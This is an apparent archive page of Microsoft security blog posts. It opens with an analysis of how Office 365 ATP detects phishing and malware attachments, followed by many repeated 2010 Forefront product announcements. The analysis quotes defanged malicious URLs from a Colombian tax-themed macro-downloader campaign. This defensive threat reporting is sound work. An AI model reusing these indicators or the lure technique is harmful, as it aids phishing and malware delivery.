Archive

Archive for the ‘antispam’ Category

Enhancing Office 365 Advanced Threat Protection with detonation-based heuristics and machine learning

Email, coupled with reliable social engineering techniques, continues to be one of the primary entry points for credential phishing, targeted attacks, and commodity malware like ransomware and, increasingly in the last few months, cryptocurrency miners.

Office 365 Advanced Threat Protection (ATP) uses a comprehensive and multi-layered solution to protect mailboxes, files, online storage, and applications against a wide range of threats. Machine learning technologies, powered by expert input from security researchers, automated systems, and threat intelligence, enable us to build and scale defenses that protect customers against threats in real-time.

Modern email attacks combine sophisticated social engineering techniques with malicious links or non-portable executable (PE) attachments like HTML or document files to distribute malware or steal user credentials. Attackers use non-PE file formats because these can be easily modified, obfuscated, and made polymorphic. These file types allow attackers to constantly tweak email campaigns to try slipping past security defenses. Every month, Office 365 ATP blocks more than 500,000 email messages that use malicious HTML and document files that open a website with malicious content.

Figure 1. Typical email attack chain

Detonation-based heuristics and machine learning

Attackers employ several techniques to evade file-based detection of attachments and blocking of malicious URLs. These techniques include multiple redirections, large dynamic and obfuscated scripts, HTML for tag manipulation, and others.

Office 365 ATP protects customers from unknown email threats in real-time by using intelligent systems that inspect attachments and links for malicious content. These automated systems include a robust detonation platform, heuristics, and machine learning models.

Detonation in controlled environments exposes thousands of signals about a file, including behaviors like dropped and downloaded files, registry manipulation for persistence and storing stolen information, outbound network connections, etc. The volume of detonated threats translate to millions of signals that need to be inspected. To scale protection, we employ machine learning technologies to sort through this massive amount of information and determine a verdict for analyzed files.

Machine learning models examine detonation artifacts along with various signals from the following:

  • Static code analysis
  • File structure anomaly
  • Phish brand impersonation
  • Threat intelligence
  • Anomaly-based heuristic detections from security researchers

Figure 2. Classifying unknown threats using detonation, heuristics, and machine learning

Our machine learning models are trained to find malicious content using hundreds of thousands of samples. These models use raw signals as features with small modifications to allow for grouping signals even when they occur in slightly different contexts. To further enhance detection, some models are built using three-gram models that use raw signals sorted by timestamps recorded during detonation. The three-gram models tend to be more sparse than raw signals, but they can act as mini-signatures that can then be scored. These types of models fill in some of the gaps, resulting in better coverage, with little impact to false positives.

Machine learning can capture and expose even uncommon threat behavior by using several technologies and dynamic featurization. Features like image similarity matching, domain reputation, web content extraction, and others enable machine learning to effectively separate malicious or suspicious behavior from the benign.

Figure 3. Machine learning expands on traditional detection capabilities

Over time, as our systems automatically process and make a verdict on millions of threats, these machine learning models will continue to improve. In the succeeding sections, well describe some interesting malware and phishing campaigns detected recently by Office 365 ATP machine learning models.

Phishing campaigns: Online banking credentials

One of the most common types of phishing attacks use HTML and document files to steal online banking credentials. Gaining access to online bank accounts is one of the easiest ways that attackers can profit from illicit activities.

The email messages typically mimic official correspondence from banks. Phishers have become very good at crafting phishing emails. They can target global banks but also localize email content for local banks.
The HTML or document attachment are designed to look like legitimate sign-in pages or forms. Online banking credentials and other sensitive information entered into these files or websites are sent to attackers. Office 365s machine learning models detect this behavior, among other signals, to determine that such attachments are malicious and block offending email messages.

Figure 4. Sample HTML files that mimic online banking sign in pages. (Click to enlarge)

Phishing campaigns: Cloud storage accounts

Another popular example of phishing campaigns uses HTML or document attachments to steal cloud storage or email account details. The email messages imply that the recipient has received a document hosted in a cloud storage service. In order to supposedly open the said document, the recipient has to enter the cloud storage or email user name and password.

This type of phishing is very rampant because gaining access to either email or cloud storage opens a lot of opportunities for attackers to access sensitive documents or compromise the victims other accounts.

Figure 5. Sample HTML files that pose as cloud storage sign in pages. (Click to enlarge)

Tax-themed phishing and malware attacks

Tax-themed social engineering attacks circulate year-round as cybercriminals take advantage of the different country and region tax schedules. These campaigns use various messages related to tax filing to convincer users to click a link or open an attachment. The social engineering messages may say the recipient is eligible for tax refund, confirm that tax payment has been completed, or declare that payments are overdue, among others.

For example, one campaign intercepted by Office 365 ATP using machine learning implied that the recipient has not completed tax filing and is due for penalty. The campaign targeted taxpayers in Colombia, where tax filing ended in October. The email message aimed to alarm taxpayers by suggesting that they have not filed their taxes.

Figure 6. Tax-themed email campaign targeting taxpayers in Colombia. The subject line translates to: You have been fined for not filing your income tax returns

The attachment is a .rar file containing an HTML file. The HTML file contains the logo of Direccin de Impuestos y Aduanas Nacionales (DIAN), the Colombianes tax and customs organization, and a link to download a file.

Figure 7. Social engineering document with a malicious link

The link points to a shortened URL hxxps://bit[.]ly/2IuYkcv that redirects to hxxp://dianmuiscaingreso[.]com/css/sanci%C3%B3n%20declaracion%20de%20renta.doc, which downloads a malicious document.

Figure 8: Malicious URL information

The malicious document carries a downloader macro code. When opened, Microsoft Word issues a security warning. In the document are instructions to Enable content, which executes the embedded malicious VBA code.

Figure 9: Malicious document with malicious macro code

If the victim falls for this social engineering attack, the macro code downloads and executes a file from hxxp://dianmuiscaingreso.com/css/w.jpg. The downloaded executable file (despite the file name) is a file injector and password-stealing malware detected by Windows Defender AV as Trojan:Win32/Tiggre!rfn.

Because Office 365 ATP machine learning detects the malicious attachment and blocks the email, the rest of the attack chain is stopped, protecting customers at the onset.

Artificial intelligence in Office 365 ATP

As threats rapidly evolve and become increasingly complex, we continuously invest in expanding capabilities in Office 365 Advanced Threat Protection to secure mailboxes from attacks. Using artificial intelligence and machine learning, Office 365 ATP can constantly scale coverage for unknown and emerging threats in-real time.

Office 365 ATPs machine learning models leverage Microsofts wide network of threat intelligence, as well as seasoned threat experts who have deep understanding of malware, cyberattacks, and attacker motivation, to combat a wide range of attacks.

This enhanced protection from Office 365 ATP contributes to and enriches the integrated Microsoft 365 threat protection, which provides intelligent, integrated, and secure solution for the modern workplace. Microsoft 365 combines the benefits and security technologies of Office 365, Windows, and Enterprise Mobility Suite (EMS) platforms.

Office 365 ATP also shares threat signals to the Microsoft Intelligent Security Graph, which uses advanced analytics to link threat intelligence and security signals across Office 365, the Windows Defender ATP stack of defenses, and other sensors. For example, when a malicious file is detected by Office 365 ATP, that threat can also be blocked on endpoints protected by Windows Defender ATP and vice versa. Connecting security data and systems allows Microsoft security technologies like Office 365 ATP to continuously improve threat protection, detection, and response.

 

 

Office 365 Threat Research

Please let us know about how you use email security solutions in your workplace

December 6th, 2010 Comments off

Hello everyone,

The Microsoft Forefront team is currently conducting a survey and would like to hear your opinions about email security, especially how you use email security solutions in your organization. We would appreciate it if you would take the time to respond to this survey.  This information will help us improve Forefront Protection for Exchange.

Please consider taking a few minutes at this time to complete the survey. This survey should take about 10 -15 minutes to complete.

 

To participate, please click here.

 

Carolyn Liu
Senior Program Manager, Forefront Server Protection

Please let us know about how you use email security solutions in your workplace

December 6th, 2010 No comments

Hello everyone,

The Microsoft Forefront team is currently conducting a survey and would like to hear your opinions about email security, especially how you use email security solutions in your organization. We would appreciate it if you would take the time to respond to this survey.  This information will help us improve Forefront Protection for Exchange.

Please consider taking a few minutes at this time to complete the survey. This survey should take about 10 -15 minutes to complete.

 

To participate, please click here.

 

Carolyn Liu
Senior Program Manager, Forefront Server Protection

Please let us know about how you use email security solutions in your workplace

December 6th, 2010 No comments

Hello everyone,

The Microsoft Forefront team is currently conducting a survey and would like to hear your opinions about email security, especially how you use email security solutions in your organization. We would appreciate it if you would take the time to respond to this survey.  This information will help us improve Forefront Protection for Exchange.

Please consider taking a few minutes at this time to complete the survey. This survey should take about 10 -15 minutes to complete.

 

To participate, please click here.

 

Carolyn Liu
Senior Program Manager, Forefront Server Protection

Please let us know about how you use email security solutions in your workplace

December 6th, 2010 No comments

Hello everyone,

The Microsoft Forefront team is currently conducting a survey and would like to hear your opinions about email security, especially how you use email security solutions in your organization. We would appreciate it if you would take the time to respond to this survey.  This information will help us improve Forefront Protection for Exchange.

Please consider taking a few minutes at this time to complete the survey. This survey should take about 10 -15 minutes to complete.

 

To participate, please click here.

 

Carolyn Liu
Senior Program Manager, Forefront Server Protection

RELEASE ANNOUNCEMENT FOR HOTFIX ROLLUP 2 for FOREFRONT PROTECTION FOR EXCHANGE

November 29th, 2010 Comments off

On behalf of the Security team at Microsoft, I am pleased to announce the release of Hotfix Rollup 2 for Microsoft’s Forefront Protection 2010 for Exchange.

 

On November 30th Microsoft shipped Hotfix Rollup 2 for Forefront Protection 2010 for Exchange to provide a series of product enhancements and new features.

 

For a complete list of the new features and enhancements included in this rollup, along with directions for download, please see the following Knowledge Base article: .http://support.microsoft.com/kb/2420647.

 

As the installer runs, server service restarts may be necessary so please plan accordingly when applying this Hotfix Rollup. 

 

Regards,

Robert McCarthy
CSS Microsoft Security

RELEASE ANNOUNCEMENT FOR HOTFIX ROLLUP 2 for FOREFRONT PROTECTION FOR EXCHANGE

November 29th, 2010 No comments

On behalf of the Security team at Microsoft, I am pleased to announce the release of Hotfix Rollup 2 for Microsoft’s Forefront Protection 2010 for Exchange.

 

On November 30th Microsoft shipped Hotfix Rollup 2 for Forefront Protection 2010 for Exchange to provide a series of product enhancements and new features.

 

For a complete list of the new features and enhancements included in this rollup, along with directions for download, please see the following Knowledge Base article: .http://support.microsoft.com/kb/2420647.

 

As the installer runs, server service restarts may be necessary so please plan accordingly when applying this Hotfix Rollup. 

 

Regards,

Robert McCarthy
CSS Microsoft Security

RELEASE ANNOUNCEMENT FOR HOTFIX ROLLUP 2 for FOREFRONT PROTECTION FOR EXCHANGE

November 29th, 2010 No comments

On behalf of the Security team at Microsoft, I am pleased to announce the release of Hotfix Rollup 2 for Microsoft’s Forefront Protection 2010 for Exchange.

 

On November 30th Microsoft shipped Hotfix Rollup 2 for Forefront Protection 2010 for Exchange to provide a series of product enhancements and new features.

 

For a complete list of the new features and enhancements included in this rollup, along with directions for download, please see the following Knowledge Base article: .http://support.microsoft.com/kb/2420647.

 

As the installer runs, server service restarts may be necessary so please plan accordingly when applying this Hotfix Rollup. 

 

Regards,

Robert McCarthy
CSS Microsoft Security

RELEASE ANNOUNCEMENT FOR HOTFIX ROLLUP 2 for FOREFRONT PROTECTION FOR EXCHANGE

November 29th, 2010 No comments

On behalf of the Security team at Microsoft, I am pleased to announce the release of Hotfix Rollup 2 for Microsoft’s Forefront Protection 2010 for Exchange.

 

On November 30th Microsoft shipped Hotfix Rollup 2 for Forefront Protection 2010 for Exchange to provide a series of product enhancements and new features.

 

For a complete list of the new features and enhancements included in this rollup, along with directions for download, please see the following Knowledge Base article: .http://support.microsoft.com/kb/2420647.

 

As the installer runs, server service restarts may be necessary so please plan accordingly when applying this Hotfix Rollup. 

 

Regards,

Robert McCarthy
CSS Microsoft Security

Hotfix rollup 3 for Forefront Security for Exchange Server SP2 and hotfix rollup 3 for Forefront Security for SharePoint SP3 are now available

October 8th, 2010 Comments off

On behalf of the Forefront Server Protection team at Microsoft, I am pleased to announce the release of Forefront Security for Exchange Server (FSE) SP2 Rollup 3 and Forefront Security for SharePoint (FSSP) SP3 Rollup 3.

 

On October 8th, 2010 Microsoft shipped both builds to address a performance issue with version 8 of the Kaspersky antivirus engine.

 

For a detailed description of the updates please see the following Knowledge Base articles:

As the installer runs, server service restarts may be necessary, so please plan accordingly when applying this hotfix rollup. 

 

Regards,

Robert McCarthy
Sr. Support Engineer
Microsoft Security

Hotfix rollup 3 for Forefront Security for Exchange Server SP2 and hotfix rollup 3 for Forefront Security for SharePoint SP3 are now available

October 8th, 2010 No comments

On behalf of the Forefront Server Protection team at Microsoft, I am pleased to announce the release of Forefront Security for Exchange Server (FSE) SP2 Rollup 3 and Forefront Security for SharePoint (FSSP) SP3 Rollup 3.

 

On October 8th, 2010 Microsoft shipped both builds to address a performance issue with version 8 of the Kaspersky antivirus engine.

 

For a detailed description of the updates please see the following Knowledge Base articles:

As the installer runs, server service restarts may be necessary, so please plan accordingly when applying this hotfix rollup. 

 

Regards,

Robert McCarthy
Sr. Support Engineer
Microsoft Security

Hotfix rollup 3 for Forefront Security for Exchange Server SP2 and hotfix rollup 3 for Forefront Security for SharePoint SP3 are now available

October 8th, 2010 No comments

On behalf of the Forefront Server Protection team at Microsoft, I am pleased to announce the release of Forefront Security for Exchange Server (FSE) SP2 Rollup 3 and Forefront Security for SharePoint (FSSP) SP3 Rollup 3.

 

On October 8th, 2010 Microsoft shipped both builds to address a performance issue with version 8 of the Kaspersky antivirus engine.

 

For a detailed description of the updates please see the following Knowledge Base articles:

As the installer runs, server service restarts may be necessary, so please plan accordingly when applying this hotfix rollup. 

 

Regards,

Robert McCarthy
Sr. Support Engineer
Microsoft Security

Hotfix rollup 3 for Forefront Security for Exchange Server SP2 and hotfix rollup 3 for Forefront Security for SharePoint SP3 are now available

October 8th, 2010 No comments

On behalf of the Forefront Server Protection team at Microsoft, I am pleased to announce the release of Forefront Security for Exchange Server (FSE) SP2 Rollup 3 and Forefront Security for SharePoint (FSSP) SP3 Rollup 3.

 

On October 8th, 2010 Microsoft shipped both builds to address a performance issue with version 8 of the Kaspersky antivirus engine.

 

For a detailed description of the updates please see the following Knowledge Base articles:

As the installer runs, server service restarts may be necessary, so please plan accordingly when applying this hotfix rollup. 

 

Regards,

Robert McCarthy
Sr. Support Engineer
Microsoft Security

Information about the new antivirus engine for Forefront and Antigen products

September 29th, 2010 No comments

Microsoft is upgrading the multi-engine protection in all Forefront server security products to support a newer version of the antivirus engine.  The newer version will provide customers with improved scanning times and reduced signature file size. The new engine replaces the older engine. 

This new engine publishes update files in a subdirectory – the first engine in the Forefront engine mix to do so.  In order to accommodate this new publishing model, Microsoft is releasing a series of roll-ups that will:

        Include the new antivirus engine

        Ensure that any engine that publishes update files in a subdirectory will update correctly

Customers must install the rollups by Jan. 31, 2011.

 

Krishnan Venkatasubramanian

Senior Program Manager, Forefront Server Protection

 

Information about the new antivirus engine for Forefront and Antigen products

September 29th, 2010 Comments off

Microsoft is upgrading the multi-engine protection in all Forefront server security products to support a newer version of the antivirus engine.  The newer version will provide customers with improved scanning times and reduced signature file size. The new engine replaces the older engine. 

This new engine publishes update files in a subdirectory – the first engine in the Forefront engine mix to do so.  In order to accommodate this new publishing model, Microsoft is releasing a series of roll-ups that will:

        Include the new antivirus engine

        Ensure that any engine that publishes update files in a subdirectory will update correctly

Customers must install the rollups by Jan. 31, 2011.

 

Krishnan Venkatasubramanian

Senior Program Manager, Forefront Server Protection

 

Information about the new antivirus engine for Forefront and Antigen products

September 29th, 2010 No comments

Microsoft is upgrading the multi-engine protection in all Forefront server security products to support a newer version of the antivirus engine.  The newer version will provide customers with improved scanning times and reduced signature file size. The new engine replaces the older engine. 

This new engine publishes update files in a subdirectory – the first engine in the Forefront engine mix to do so.  In order to accommodate this new publishing model, Microsoft is releasing a series of roll-ups that will:

        Include the new antivirus engine

        Ensure that any engine that publishes update files in a subdirectory will update correctly

Customers must install the rollups by Jan. 31, 2011.

 

Krishnan Venkatasubramanian

Senior Program Manager, Forefront Server Protection

 

Information about the new antivirus engine for Forefront and Antigen products

September 29th, 2010 No comments

Microsoft is upgrading the multi-engine protection in all Forefront server security products to support a newer version of the antivirus engine.  The newer version will provide customers with improved scanning times and reduced signature file size. The new engine replaces the older engine. 

This new engine publishes update files in a subdirectory – the first engine in the Forefront engine mix to do so.  In order to accommodate this new publishing model, Microsoft is releasing a series of roll-ups that will:

        Include the new antivirus engine

        Ensure that any engine that publishes update files in a subdirectory will update correctly

Customers must install the rollups by Jan. 31, 2011.

 

Krishnan Venkatasubramanian

Senior Program Manager, Forefront Server Protection

 

Forefront Server Protection RSS feeds are now available!

September 23rd, 2010 No comments

Hello,

 

I’d like to take a moment and encourage each of you to check out Microsoft’s latest efforts to save you support costs and time.

 

Introducing Forefront Server RSS feeds:   Forefront Server RSS Feeds

 

By subscribing to our Forefront Server RSS feed, you allow Microsoft to give you the answers without having to ask the questions. Our goal is to provide insight into the top Forefront Server solutions as early as possible while saving you the time, resources, and effort of opening a support case. Our Solution Center list page ( Solution Centers ) provides an RSS icon in the upper right hand corner of your browser that points to the feed subscription page as well.

 

Empower yourself! Subscribe, ask questions, and provide feedback!

 

 

And remember, the bad guys never sleep and are busy developing new ways to wreak havoc on your network. Forefront developers work tirelessly to give you the latest means to defend against these attacks. Make sure you are incorporating these shields into your environment with the latest updates for Forefront Server products: Forefront Server Product Updates.

 

 

Rob McCarthy

Sr. Support Engineer
CSS Security

Forefront Server Protection RSS feeds are now available!

September 23rd, 2010 Comments off

Hello,

 

I’d like to take a moment and encourage each of you to check out Microsoft’s latest efforts to save you support costs and time.

 

Introducing Forefront Server RSS feeds:   Forefront Server RSS Feeds

 

By subscribing to our Forefront Server RSS feed, you allow Microsoft to give you the answers without having to ask the questions. Our goal is to provide insight into the top Forefront Server solutions as early as possible while saving you the time, resources, and effort of opening a support case. Our Solution Center list page ( Solution Centers ) provides an RSS icon in the upper right hand corner of your browser that points to the feed subscription page as well.

 

Empower yourself! Subscribe, ask questions, and provide feedback!

 

 

And remember, the bad guys never sleep and are busy developing new ways to wreak havoc on your network. Forefront developers work tirelessly to give you the latest means to defend against these attacks. Make sure you are incorporating these shields into your environment with the latest updates for Forefront Server products: Forefront Server Product Updates.

 

 

Rob McCarthy

Sr. Support Engineer
CSS Security

Forefront Server Protection RSS feeds are now available!

September 23rd, 2010 No comments

Hello,

 

I’d like to take a moment and encourage each of you to check out Microsoft’s latest efforts to save you support costs and time.

 

Introducing Forefront Server RSS feeds:   Forefront Server RSS Feeds

 

By subscribing to our Forefront Server RSS feed, you allow Microsoft to give you the answers without having to ask the questions. Our goal is to provide insight into the top Forefront Server solutions as early as possible while saving you the time, resources, and effort of opening a support case. Our Solution Center list page ( Solution Centers ) provides an RSS icon in the upper right hand corner of your browser that points to the feed subscription page as well.

 

Empower yourself! Subscribe, ask questions, and provide feedback!

 

 

And remember, the bad guys never sleep and are busy developing new ways to wreak havoc on your network. Forefront developers work tirelessly to give you the latest means to defend against these attacks. Make sure you are incorporating these shields into your environment with the latest updates for Forefront Server products: Forefront Server Product Updates.

 

 

Rob McCarthy

Sr. Support Engineer
CSS Security